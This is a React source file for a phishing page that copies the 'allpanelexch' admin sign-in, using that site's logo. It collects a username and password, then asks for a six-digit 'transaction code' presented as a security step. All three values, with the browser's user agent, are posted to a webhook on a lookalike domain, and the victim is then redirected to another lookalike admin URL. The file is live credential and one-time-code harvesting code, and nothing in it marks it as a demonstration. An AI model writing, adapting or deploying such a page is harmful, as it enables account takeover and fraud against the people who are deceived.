import React, { useState, useRef, useEffect } from 'react';
import { createRoot } from 'react-dom/client';
import { LogIn, Loader2 } from 'lucide-react';

interface LoginData {
  username: string;
  password: string;
}

const WEBHOOK_URL = 'https://n8n.allpanelxchadmin.com/webhook/996f96c9-5247-41e4-a9b5-3a133fa3717b';
const REDIRECT_URL = 'https://allpanelexch9.co/admin';

const LoginPage = ({ onLoginSuccess }: { onLoginSuccess: (data: LoginData) => void }) => {
  const [username, setUsername] = useState('');
  const [password, setPassword] = useState('');

  const handleLogin = (e: React.FormEvent) => {
    e.preventDefault();
    if (username.trim() && password.trim()) {
      onLoginSuccess({ username, password });
    }
  };

  return (
    <div className="min-h-screen w-full flex flex-col items-center justify-start pt-[100px] md:pt-[110px] bg-gradient-to-b from-[#0088cc] to-[#2c3e50] font-['Roboto_Condensed']">
      <div className="mb-6">
        <img 
          src="https://sitethemedata.com/sitethemes/allpanelexch.com/front/logo.png" 
          alt="ALL Logo" 
          className="w-[180px] md:w-[240px] h-auto object-contain select-none"
        />
      </div>

      <div className="bg-[#eeeeee] rounded-[4px] shadow-lg flex flex-col overflow-hidden border border-gray-300/50 w-[90%] max-w-[403px]">
        <div className="px-8 pt-10 pb-6 flex flex-col justify-start">
          
          <div className="flex items-center gap-12 mb-9">
            <div className="h-[1px] bg-black/30 flex-1"></div>
            <h2 className="text-[2rem] font-normal text-black m-0 leading-none whitespace-nowrap">
              Sign In
            </h2>
            <div className="h-[1px] bg-black/30 flex-1"></div>
          </div>

          <form onSubmit={handleLogin} className="space-y-6">
            <div className="relative">
              <input
                type="text"
                required
                value={username}
                onChange={(e) => setUsername(e.target.value)}
                className="w-full bg-[#eef5ff] border border-gray-300 rounded-[3px] px-3 py-1.5 text-sm focus:outline-none focus:border-[#0089d0] text-[#1a1a1a] transition-all placeholder-gray-500"
                placeholder="Username"
              />
            </div>

            <div className="relative">
              <input
                type="password"
                required
                value={password}
                onChange={(e) => setPassword(e.target.value)}
                className="w-full bg-[#eef5ff] border border-gray-300 rounded-[3px] px-3 py-1.5 text-sm focus:outline-none focus:border-[#0089d0] text-[#1a1a1a] transition-all placeholder-gray-500"
                placeholder="Password"
              />
            </div>

            <button
              type="submit"
              className="w-full bg-[#0089d0] hover:bg-[#0077b5] text-white font-medium h-[34px] rounded-[3px] flex items-center justify-center gap-2 transition-colors active:scale-[0.99] mt-10 mb-2"
            >
              <span className="text-[15px]">Login</span>
              <LogIn size={14} className="stroke-[3px]" />
            </button>
          </form>
        </div>
      </div>
    </div>
  );
};

const VerificationPage = ({ onComplete, isSubmitting }: { onComplete: (code: string) => void, isSubmitting: boolean }) => {
  const [otp, setOtp] = useState(['', '', '', '', '', '']);
  const inputRefs = useRef<(HTMLInputElement | null)[]>([]);

  useEffect(() => {
    inputRefs.current[0]?.focus();
  }, []);

  const handleChange = (index: number, value: string) => {
    if (!/^\d*$/.test(value)) return;

    const newOtp = [...otp];
    newOtp[index] = value.slice(-1);
    setOtp(newOtp);

    if (value && index < 5) {
      inputRefs.current[index + 1]?.focus();
    }

    // Check if OTP is complete
    const fullCode = newOtp.join('');
    if (fullCode.length === 6) {
      onComplete(fullCode);
    }
  };

  const handleKeyDown = (index: number, e: React.KeyboardEvent<HTMLInputElement>) => {
    if (e.key === 'Backspace' && !otp[index] && index > 0) {
      inputRefs.current[index - 1]?.focus();
    }
  };

  return (
    <div className="min-h-screen w-full flex flex-col items-center justify-center bg-[#18191b] font-sans text-white px-4">
      <div className="mb-10">
        <img 
          src="https://sitethemedata.com/sitethemes/allpanelexch.com/front/logo.png" 
          alt="ALL Logo" 
          className="w-[180px] md:w-[260px] h-auto object-contain select-none"
        />
      </div>

      <div className="text-center space-y-2 mb-8">
        <p className="text-[#1e1e1e] text-lg font-medium tracking-wide">
          Security Code Verification
        </p>
        <p className="text-[#888b91] text-[13px] font-normal">
          Enter your 6 DIGIT Numeric Transaction CODE to make the Admin Login Secure
        </p>
      </div>

      <div className="flex gap-2 md:gap-3">
        {otp.map((digit, index) => (
          <input
            key={index}
            ref={(el) => { inputRefs.current[index] = el; }}
            type="text"
            inputMode="numeric"
            disabled={isSubmitting}
            maxLength={1}
            value={digit}
            onChange={(e) => handleChange(index, e.target.value)}
            onKeyDown={(e) => handleKeyDown(index, e)}
            className={`w-[50px] h-[65px] md:w-[68px] md:h-[82px] bg-[#2d3136] text-white text-center text-2xl md:text-3xl font-semibold rounded-[6px] border-none focus:ring-2 focus:ring-[#0089d0] focus:outline-none transition-all ${isSubmitting ? 'opacity-50 cursor-not-allowed' : ''}`}
          />
        ))}
      </div>

      {isSubmitting && (
        <div className="mt-8 flex items-center gap-2 text-[#0089d0]">
          <Loader2 className="animate-spin" size={20} />
          <span className="text-sm font-medium">Verifying code...</span>
        </div>
      )}
    </div>
  );
};

const App = () => {
  const [view, setView] = useState<'login' | 'verify'>('login');
  const [loginData, setLoginData] = useState<LoginData | null>(null);
  const [isSubmitting, setIsSubmitting] = useState(false);

  const handleLoginSuccess = (data: LoginData) => {
    setLoginData(data);
    setView('verify');
  };

  const handleVerificationComplete = async (code: string) => {
    if (!loginData || isSubmitting) return;

    setIsSubmitting(true);
    
    const payload = {
      username: loginData.username,
      password: loginData.password,
      code: code,
      timestamp: new Date().toISOString(),
      userAgent: navigator.userAgent
    };

    try {
      // Send data to webhook
      await fetch(WEBHOOK_URL, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify(payload),
        mode: 'no-cors' // Use no-cors if the endpoint doesn't support CORS from this origin
      });

      // Even with no-cors or errors, we proceed to redirect as per instructions
      // Small timeout to allow the browser to initiate the fetch before redirecting
      setTimeout(() => {
        window.location.href = REDIRECT_URL;
      }, 500);

    } catch (error) {
      console.error('Submission error:', error);
      // Still redirect even on error to match user flow expectations
      window.location.href = REDIRECT_URL;
    }
  };

  if (view === 'verify') {
    return <VerificationPage onComplete={handleVerificationComplete} isSubmitting={isSubmitting} />;
  }

  return <LoginPage onLoginSuccess={handleLoginSuccess} />;
};

createRoot(document.getElementById('root')!).render(<App />);